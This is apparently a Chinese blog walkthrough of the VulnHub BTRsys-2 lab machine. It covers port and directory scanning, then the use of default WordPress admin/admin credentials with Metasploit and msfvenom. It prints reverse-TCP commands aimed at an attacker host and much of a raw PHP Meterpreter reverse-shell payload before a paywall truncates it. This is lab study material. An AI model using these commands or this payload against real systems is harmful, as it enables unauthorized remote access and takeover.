【vulnhub】BTRsys-2 靶机

最新推荐文章于 2024-05-10 11:16:14 发布
最新推荐文章于 2024-05-10 11:16:14 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: 信息安全 # 靶机 文章标签: 安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nicky_Zheng/article/details/113375198
版权

1、信息收集

1.1、端口扫描

使用netdiscorarp获取到靶机 ip:192.168.57.137

使用nmap获取端口信息

kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:41 CST
Nmap scan report for 192.168.57.137
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:F8:60:F0 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.88 seconds

根据获取到的端口信息,通常openssh较难利用,其次是软件版本的漏洞,优先考虑web应用

1.2、目录扫描

使用gobuster对 80 端口进行目录扫描

kali@kali:~$ gobuster dir -u http://192.168.57.137 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.57.137
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/23 12:44:57 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/upload (Status: 301)
/wordpress (Status: 301)
===============================================================
2020/12/23 12:45:00 Finished
===============================================================

发现存在WordPress应用

2、尝试利用

发现WordPress应用为默认用户名密码,尝试使用msf文件上传模块

kali@kali:~$ msfconsole 
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.0.16-dev                          ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with irb

msf6 > use exploit/unix/webapp/wp_admin_shell_upload 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.57.137
rhosts => 192.168.57.137
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress/
targeturi => /wordpress/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 192.168.57.200
lhost => 192.168.57.200
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit 

[*] Started reverse TCP handler on 192.168.57.200:4444 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

无法成功利用,尝试在界面上写入shellcode反弹shell

2.1、生成恶意payload

通过msfvenom 生成攻击载荷,由于无法生成php格式的文件,直接将载荷原样输出到界面上

此处的payload需要与监听端口使用的payload相同

kali@kali:~$ msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.57.200 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34281 bytes
/*<?php /**/ if (!isset($GLOBALS['channels'])) {
    $GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) {
    $GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) {
    $GLOBALS['resource_type_map'] = array(); } if (!isset($GLOBALS['udp_host_map'])) {
    $GLOBALS['udp_host_map'] = array(); } if (!isset($GLOBALS['readers'])) {
    $GLOBALS['readers'] = array(); } if (!isset($GLOBALS['id2f'])) {
    $GLOBALS['id2f'] = array(); } function register_command($c, $i) {
    global $id2f; if (! in_array($i, $id2f)) {
    $id2f[$i] = $c; } } function my_print($str) {
    } my_print("Evaling main meterpreter stage"); function dump_array($arr, $name=null) {
    if (is_null($name)) {
    $name = "Array"; } my_print(sprintf("$name (%s)", count($arr))); foreach ($arr as $key => $val) {
    if (is_array($val)) {
    dump_array($val, "{
   $name}[{
   $key}]"); } else {
    my_print(sprintf(" $key ($val)")); } } } function dump_readers() {
    global $readers; dump_array($readers, 'Readers'); } function dump_resource_map() {
    global $resource_type_map; dump_array($resource_type_map, 'Resource map'); } function dump_channels($extra="") {
    global $channels; dump_array($channels, 'Channels '.$extra); } if (!function_exists("file_get_contents")) {
    function file_get_contents($file) {
    $f = @fopen($file,"rb"); $contents = false; if ($f) {
    do {
    $contents .= fgets($f); } while (!feof($f)); } fclose($f); return $contents; } } if (!function_exists('socket_set_option')) {
    function socket_set_option($sock, $type, $opt, $value) {
    socket_setopt($sock, $type, $opt, $value); } } define("PAYLOAD_UUID", "\x98\x74\xec\x0f\x1b\xba\x3c\xd9\x4c\xaf\x5f\xa0\x13\x4d\x81\x6c"); define("SESSION_GUID", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"); define("AES_256_CBC", 'aes-256-cbc'); define("ENC_NONE", 0); define("ENC_AES256", 1); define("PACKET_TYPE_REQUEST", 0); define("PACKET_TYPE_RESPONSE", 1); define("PACKET_TYPE_PLAIN_REQUEST", 10); define("PACKET_TYPE_PLAIN_RESPONSE", 11); define("ERROR_SUCCESS", 0); define("ERROR_FAILURE", 1); define("CHANNEL_CLASS_BUFFERED", 0); define("CHANNEL_CLASS_STREAM", 1); define("CHANNEL_CLASS_DATAGRAM", 2); define("CHANNEL_CLASS_POOL", 3); define("TLV_META_TYPE_NONE", ( 0 )); define("TLV_META_TYPE_STRING", (1 << 16)); define("TLV_META_TYPE_UINT", (1 << 17)); define("TLV_META_TYPE_RAW", (1 << 18)); define("TLV_META_TYPE_BOOL", (1 << 19)); define("TLV_META_TYPE_QWORD", (1 << 20)); define("TLV_META_TYPE_COMPRESSED", (1 << 29)); define("TLV_META_TYPE_GROUP", (1 << 30)); define("TLV_META_TYPE_COMPLEX", (1 << 31)); define("TLV_META_TYPE_MASK", (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)); define("TLV_RESERVED", 0); define("TLV_EXTENSIONS", 20000); define("TLV_USER", 40000); define("TLV_TEMP", 60000); define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0); define("TLV_TYPE_COMMAND_ID", TLV_META_TYPE_UINT | 1); define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2); define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3); define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4); define("TLV_TYPE_STRING", TLV_META_TYPE_STRING | 10); define("TLV_TYPE_UINT", TLV_META_TYPE_UINT | 11); define("TLV_TYPE_BOOL", TLV_META_TYPE_BOOL | 12); define("TLV_TYPE_LENGTH", TLV_META_TYPE_UINT | 25); define("TLV_TYPE_DATA", TLV_META_TYPE_RAW | 26); define("TLV_TYPE_FLAGS", TLV_META_TYPE_UINT | 27); define("TLV_TYPE_CHANNEL_ID", TLV_META_TYPE_UINT | 50); define("TLV_TYPE_CHANNEL_TYPE", TLV_META_TYPE_STRING | 51); define("TLV_TYPE_CHANNEL_DATA", TLV_META_TYPE_RAW | 52); define("TLV_TYPE_CHANNEL_DATA_GROUP", TLV_META_TYPE_GROUP | 53); define("TLV_TYPE_CHANNEL_CLASS", TLV_META_TYPE_UINT | 54); define("TLV_TYPE_SEEK_WHENCE", TLV_META_TYPE_UINT | 70); define("TLV_TYPE_SEEK_OFFSET", TLV_META_TYPE_UINT | 71); define("TLV_TYPE_SEEK_POS", TLV_META_TYPE_UINT | 72); define("TLV_TYPE_EXCEPTION_CODE", TLV_META_TYPE_UINT | 300); define("TLV_TYPE_EXCEPTION_STRING", TLV_META_TYPE_STRING | 301); define("TLV_TYPE_LIBRARY_PATH", TLV_META_TYPE_STRING | 400); define("TLV_TYPE_TARGET_PATH", TLV_META_TYPE_STRING | 401); define("TLV_TYPE_MACHINE_ID", TLV_META_TYPE_STRING | 460); define("TLV_TYPE_UUID", TLV_META_TYPE_RAW | 461); define("TLV_TYPE_SESSION_GUID", TLV_META_TYPE_RAW | 462); define("TLV_TYPE_RSA_PUB_KEY", TLV_META_TYPE_RAW | 550); define("TLV_TYPE_SYM_KEY_TYPE", TLV_META_TYPE_UINT | 551); define("TLV_TYPE_SYM_KEY", TLV_META_TYPE_RAW | 552); define("TLV_TYPE_ENC_SYM_KEY", TLV_META_TYPE_RAW | 553); define('EXTENSION_ID_CORE', 0); define('COMMAND_ID_CORE_CHANNEL_CLOSE', 1); define('COMMAND_ID_CORE_CHANNEL_EOF', 2); define('COMMAND_ID_CORE_CHANNEL_INTERACT', 3); define('COMMAND_ID_CORE_CHANNEL_OPEN', 4); define('COMMAND_ID_CORE_CHANNEL_READ', 5); define('COMMAND_ID_CORE_CHANNEL_SEEK', 6); define('COMMAND_ID_CORE_CHANNEL_TELL', 7); define('COMMAND_ID_CORE_CHANNEL_WRITE', 8); define('COMMAND_ID_CORE_CONSOLE_WRITE', 9); define('COMMAND_ID_CORE_ENUMEXTCMD', 10); define('COMMAND_ID_CORE_GET_SESSION_GUID', 11); define('COMMAND_ID_CORE_LOADLIB', 12); define('COMMAND_ID_CORE_MACHINE_ID', 13); define('COMMAND_ID_CORE_MIGRATE', 14); define('COMMAND_ID_CORE_NATIVE_ARCH', 15); define('COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION', 16); define('COMMAND_ID_CORE_PATCH_URL', 17); define('COMMAND_ID_CORE_PIVOT_ADD', 18); define('COMMAND_ID_CORE_PIVOT_REMOVE', 19); define('COMMAND_ID_CORE_PIVOT_SESSION_DIED', 20); define('COMMAND_ID_CORE_SET_SESSION_GUID', 21); define('COMMAND_ID_CORE_SET_UUID', 22); define('COMMAND_ID_CORE_SHUTDOWN', 23); define('COMMAND_ID_CORE_TRANSPORT_ADD', 24); define('COMMAND_ID_CORE_TRANSPORT_CHANGE', 25); define('COMMAND_ID_CORE_TRANSPORT_GETCERTHASH', 26); define('COMMAND_ID_CORE_TRANSPORT_LIST', 27); define('COMMAND_ID_CORE_TRANSPORT_NEXT', 28); define('COMMAND_ID_CORE_TRANSPORT_PREV', 29); define('COMMAND_ID_CORE_TRANSPORT_REMOVE', 30); define('COMMAND_ID_CORE_TRANSPORT_SETCERTHASH', 31); define('COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS', 32); define('COMMAND_ID_CORE_TRANSPORT_SLEEP', 33); function my_cmd($cmd) {
    return shell_exec($cmd); } function is_windows() {
    return (strtoupper(substr(PHP_OS,0,3)) == "WIN"); } if (!function_exists('core_channel_open')) {
    register_command('core_channel_open', COMMAND_ID_CORE_CHANNEL_OPEN); function core_channel_open($req, &$pkt) {
    $type_tlv
最低0.47元/天 解锁文章
d41b
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF靶场——BTRsys-2
su__xiaoyan的博客
01-24 1061
实验环境 攻击机:192.168.100.146 靶机:192.168.100.139 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 FTP服务由vsftpd 3.0.3搭建,不存在代码溢出漏洞 网站详细信息探测 网站疑似使用WordPress作为建站系统 web网站目录爆破 证实以WordPress作为建站系统,并且拿到网站后台登录页面 访问网站后台登录页面,尝试使用弱口令进行登录,登录成功(admin/admin) 漏洞利用 WordPress后台存
vulnhub:BTRSys2
cjstang的博客
06-18 2363
OSCP-3:主要利用方式:wordpress账号密码破解+PHP马反弹shell+系统内核低版本提权
文件随意信息泄露/任意文件读取漏洞-入门白帽子自学
最新发布
程序员六七的博客
05-10 332
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任
靶机-BTRSys 2.1 Walkthrough
banacyo14206的博客
08-22 659
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...
vulnhub BTRSys: v2.1
箭雨镜屋
08-30 552
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan扫描wordpress用户名并爆破密码 ---- 利用WordPress的模板编辑功能getshell ---- wordpress配置文件泄露数据库用户名密码 ---- 数据库泄露btrisk用户的密码 ---- sudo su提权...
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2758
Vulnhub-Btrsys-2靶机实战
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
再度升级:深入分析针对金融科技公司的Evilnum恶意软件及组件
systemino的博客
08-26 817
ESET团队详细分析了Evilnum恶意组织的运作方式及其部署的工具集,该工具集会针对金融科技行业中精心选择的目标发动攻击。 0x00 概述 ESET详细分析了Evilnum恶意组织的运作方式,Evilnum是Evilnum恶意软件背后的APT恶意组织,此前曾经针对金融科技类公司发动攻击。自2018年以来,该恶意组织就已经进入到人们的事业中,并且曾有研究人员对其分析,但是,此前却从没有研究过其背后的恶意组织以及运行模式。 在本文中,我们将不同点结合起来,详细分析Evilnum的恶意活动。该恶意组织所针
红队常用命令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-11 5347
原文链接。
Metasploit中Exploit模块check方法详述
07-27 6085
Exploit模块的check方法用来检测一台远程主机是否有漏洞能够被利用。check方法默认的实施仅返回check方法不被Exploit模块支持。当然,一个完整的代码能够从check方法返回如表6.5所示的信息。
cve-2019-0708 msf 执行报错解决
热门推荐
大哥一声吼
12-03 1万+
cve-2019-0708 msf 执行报错解决 在检查服务器是否存在漏洞的过程中,发现exploit 报错, 报错信息如下,已经很明显了 Exploit aborted due to failure: bad-config: Set the most appropriate target manually ,没有正确设置好参数 msf5 exploit(windows/rdp/cve_2...
靶机渗透—unknowndevice64
ray_kong的博客
04-04 4416
渗透unknowndevice64下载地址渗透IP扫描端口扫描http端口访问ssh端口访问rbash逃逸提权 下载地址 download unknowndevice64 地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/ 渗透 IP扫描 sudo arp-scan -l //确定靶机IP地址 扫描到的靶机IP地址是 192.168.10.129 端口扫描 sudo nmap -p- 192.168.10.129 //靶机开放端口 sud
kali-vulnhub:doubletrouble
curme_miller的博客
01-26 4153
1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110) 为Debian,没有发现较明显的信息 2.开始扫描端口 $ nmap -Pn 192.168.0.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org
MSF后渗透
wo41ge的博客
11-24 3691
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值